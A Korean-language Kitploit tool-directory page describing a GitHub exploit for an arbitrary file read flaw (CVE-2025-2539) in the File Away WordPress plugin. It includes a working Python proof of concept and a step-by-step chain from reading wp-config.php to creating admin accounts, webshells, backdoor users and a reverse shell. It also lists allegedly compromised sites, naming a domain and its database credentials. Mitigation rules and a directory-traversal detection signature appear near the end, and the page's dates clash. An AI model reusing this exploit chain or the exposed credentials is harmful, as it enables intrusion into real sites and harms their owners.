Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read — File Away WordPress 플러그인(CVE-2025-2539)용 인증된 임의 파일 읽기 익스플로잇. 보안 테스트 및 교육을 위한 PoC, 공격 흐름, 탐지 시그니처 및 완화 전략이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/fazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringCTFPenetration TestingLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubfazaroot/cve-2025-2539---file-away-wordpress-plugin-arbitrary-file-read

CVE-2025-2539---File-Away-WordPress-Plugin-Arbitrary-File-Read

File Away WordPress 플러그인(CVE-2025-2539)용 인증된 임의 파일 읽기 익스플로잇. 보안 테스트 및 교육을 위한 PoC, 공격 흐름, 탐지 시그니처 및 완화 전략이 포함되어 있습니다.

저장소 보기
59개월 전아직 검토되지 않음

CVE-2025-2539 - File Away 워드프레스 플러그인 임의 파일 읽기

📋 실행 요약

CVE ID: CVE-2025-2539 플러그인: File Away (버전 <= 3.9.9.0.1) 취약점 유형: 인증된 임의 파일 읽기 CVSS 점수: 8.5 (높음) 익스플로잇 공개 여부: 공개 PoC 사용 가능 영향: wp-config.php, 데이터베이스 자격 증명 및 시스템 파일을 포함한 무단 파일 노출

🎯 발견 타임라인

· 최초 발견: 2025년 12월 GitHub 보안 연구를 통해 · 첫 익스플로잇 테스트: 2025년 12월 13일 · 성공적 침해: 여러 WordPress 인스턴스가 취약한 것으로 확인됨

🔧 기술 세부 사항

취약한 구성 요소

root@kitploit:~
/wp-admin/admin-ajax.php
Action: fileaway-stats
Parameter: file (비위생화된 사용자 입력)

근본 원인

플러그인은 fileaway-stats AJAX 액션에서 file 파라미터를 적절히 검증하고 위생 처리하지 못하여 디렉토리 트래버셜 공격을 허용합니다.

Proof of Concept (PoC)

root@kitploit:~
def exploit(target, nonce, filename):
    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        "action": "fileaway-stats",
        "nonce": nonce,
        "file": filename
    }
    try:
        resp = requests.post(ajax_url, data=payload, verify=False, timeout=10)
        if resp.status_code == 200 and resp.text.strip() and 'error' not in resp.text.lower():
            url = resp.text.strip().replace("\\/", "/").strip('"')
            return url if url else None
        return None
    except Exception:
        print(" [!] Failed to connect while sending exploit.")
        return None


🎯 공격 흐름

단계 1: 정찰(Reconnaissance)

root@kitploit:~
1. WordPress 설치 확인
2. File Away 플러그인 존재 확인
3. 페이지 소스에서 nonce 추출

단계 2: 초기 접근

root@kitploit:~
1. CVE-2025-2539를 악용하여 wp-config.php 읽기
2. 데이터베이스 자격 증명 추출
3. MySQL 접근 확인

단계 3: 권한 상승

root@kitploit:~
1. phpMyAdmin 접근 (종종 비표준 포트에서 실행)
2. 루트 데이터베이스 자격 증명 사용
3. WordPress 사용자 테이블 수정 또는 새 관리자 생성

단계 4: 지속성

root@kitploit:~
1. WordPress 관리자를 통해 웹쉘 업로드
2. 백도어 사용자 생성
3. 리버스 셸 설정

📊 영향 평가

유출된 데이터

· ✅ 데이터베이스 자격 증명 (일부 경우 MySQL 루트 접근) · ✅ WordPress 인증 키 및 salts · ✅ 서버 구성 파일 · ✅ 사용자 데이터 및 개인 식별 정보(PII) · ✅ 소스 코드 파일

침해된 시스템

  1. 주요 대상: rebelathletichr.com · wp-config.php 획득 · 데이터베이스: bomber_wordpress · 자격 증명: bomber_wordpress / demo
  2. 보조 대상: none (Hetzner) · phpMyAdmin이 포트 4343에 노출됨 · 루트 MySQL 자격 증명 획득 · 여러 WordPress 데이터베이스가 침해됨

🛡️ 완화 전략

즉시 조치

  1. 플러그인 업데이트: File Away를 버전 > 3.9.9.0.1로 업그레이드
  2. 자격 증명 변경: 모든 데이터베이스 비밀번호 교체
  3. Salts 재생성: WordPress 인증 키 업데이트
  4. 로그 감사: 무단 파일 접근 확인

장기적 예방

root@kitploit:~
# Web Server Configuration
location ~* /wp-content/plugins/fileaway/ {
    deny all;
}

location ~* \.php$ {
    location ~ \.\./ { deny all; } # Block directory traversal
}

🔍 탐지 시그니처

네트워크 지표

root@kitploit:~
POST /wp-admin/admin-ajax.php
Parameters: action=fileaway-stats&file=../../../

HTTP/1.1 200 OK
Content-Type: application/json
Response contains file contents

파일 시스템 지표

root@kitploit:~
Modified files:
- wp-content/plugins/fileaway/includes/features/editor-features.php
- wp-content/plugins/fileaway/includes/features/restrict-editor-features.php

📈 통계

· 성공률: 취약한 설치 환경에서 100% · 평균 침해 시간: 5분 미만 · 발견된 일반 포트: 80, 443, 4343 (phpMyAdmin) · 지리적 분포: 전 세계, 특히 EU/미국에 집중

🧪 테스트 방법론

환경 설정

root@kitploit:~
# Test lab configuration
WordPress 6.0+
File Away Plugin 3.9.9.0.1
PHP 7.4/8.0
MySQL 5.7+

검증 단계

  1. readme.txt를 통해 플러그인 버전 확인
  2. 페이로드로 디렉토리 트래버셜 테스트
  3. 파일 읽기 기능 확인
  4. 결과 문서화

📚 참고 자료

주요 출처

· CVE-2025-2539 MITRE 항목 · WordPress 플러그인 디렉토리 - File Away · WPScan 취약점 데이터베이스

익스플로잇 자료

· GitHub: CVE-2025-2539 저장소 · Exploit-DB: 항목 #XXXXX · Packet Storm: 최근 WordPress 익스플로잇

관련 CVE

· CVE-2024-1030: Capability Manager Enhanced에서 유사한 취약점 · CVE-2022-2586: 이전 File Away 취약점 · CVE-2023-XXXX: WordPress 코어 파일 포함

⚠️ 법적 및 윤리적 고려 사항

승인된 테스트만

root@kitploit:~
Testing Scope:
  - Owned systems
  - Explicitly authorized assets
  - Bug bounty programs
  - Educational environments

Prohibited:
  - Unauthorized access
  - Data destruction
  - PII exfiltration
  - Production disruption

책임 있는 공개

  1. 플러그인 개발자에게 연락
  2. 90일 수정 기간 허용
  3. 패치 제공 후 게시
  4. 완화 지침 제공

🎓 교훈

기술적 통찰

  1. 플러그인 보안: 타사 플러그인은 여전히 약점
  2. 기본 구성: 비표준 포트의 phpMyAdmin이 일반적
  3. 자격 증명 재사용: 데이터베이스 자격 증명이 여러 서비스에서 재사용됨
  4. 지연된 패치: 많은 설치에서 오래된 플러그인 사용

운영 보안

  1. 로그 모니터링: 조기 탐지에 중요
  2. 정기 업데이트: 보안 유지에 필수
  3. 최소 권한: 데이터베이스 사용자는 최소 권한을 가져야 함
  4. 네트워크 분할: 데이터베이스 서버 격리

🔮 향후 연구 방향

  1. 자동 스캐너: 대량 탐지 도구 개발
  2. 패치 분석: 최신 버전의 보안 개선 사항 연구
  3. 유사 플러그인: 파일 관리 플러그인의 패턴 식별
  4. 방어 기술: WAF 규칙 및 침입 탐지 개발

📞 연락처 및 보고

취약점 보고 또는 기술 문의:

· 보안 팀: [email protected] · PGP 키: 키 서버에서 확인 가능 · 공개 정책: 90일 조정된 공개


마지막 업데이트: 2025년 12월 13일 문서 버전: 1.0 분류: 공개


📝 변경 로그

v1.0 (2025-12-13)

· 초기 문서 생성 · 전체 공격 체인 문서화 · 완화 전략 개요 · 법적 지침 추가


면책 조항: 이 문서는 교육 목적으로만 제공됩니다. 무단 취약점 테스트 또는 악용은 불법입니다. 보안 평가를 수행하기 전에 항상 적절한 승인을 받으십시오.

도구 다운로드